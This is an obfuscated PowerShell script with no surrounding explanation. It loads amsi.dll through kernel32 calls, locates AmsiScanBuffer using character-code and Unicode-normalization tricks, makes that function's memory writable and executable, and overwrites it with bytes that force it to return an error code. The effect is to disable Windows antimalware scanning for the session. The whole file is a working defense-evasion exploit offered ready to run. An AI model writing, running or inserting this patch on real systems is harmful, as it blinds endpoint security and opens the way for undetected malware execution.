$axfck = @"
using System;
using System.Runtime.InteropServices;
public class axfck {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr xjlbln, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $axfck

$fwuaugh = [axfck]::LoadLibrary("$([CHAr]([BYTE]0x61)+[CHAr]([bYTe]0x6d)+[chAR]([ByTe]0x73)+[Char]([bytE]0x69)+[cHAR]([bYte]0x2e)+[Char](100+13-13)+[cHar]([BYte]0x6c)+[cHAR]([byTe]0x6c))")
$corgrx = [axfck]::GetProcAddress($fwuaugh, "$(('Àmsí'+'Scán'+'Buff'+'er').nOrmALizE([Char](70+35-35)+[chaR]([byTE]0x6f)+[CHar](91+23)+[ChaR]([Byte]0x6d)+[CHAr]([byTe]0x44)) -replace [cHaR](32+60)+[cHaR](112*48/48)+[chaR](123*11/11)+[cHAr]([BYTE]0x4d)+[chaR](110*51/51)+[chAR]([ByTe]0x7d))")
$p = 0
[axfck]::VirtualProtect($corgrx, [uint32]5, 0x40, [ref]$p)
$ioxg = "0xB8"
$tfsm = "0x57"
$yfpd = "0x00"
$rydg = "0x07"
$mmoc = "0x80"
$dywx = "0xC3"
$lhrgv = [Byte[]] ($ioxg,$tfsm,$yfpd,$rydg,+$mmoc,+$dywx)
[System.Runtime.InteropServices.Marshal]::Copy($lhrgv, 0, $corgrx, 6)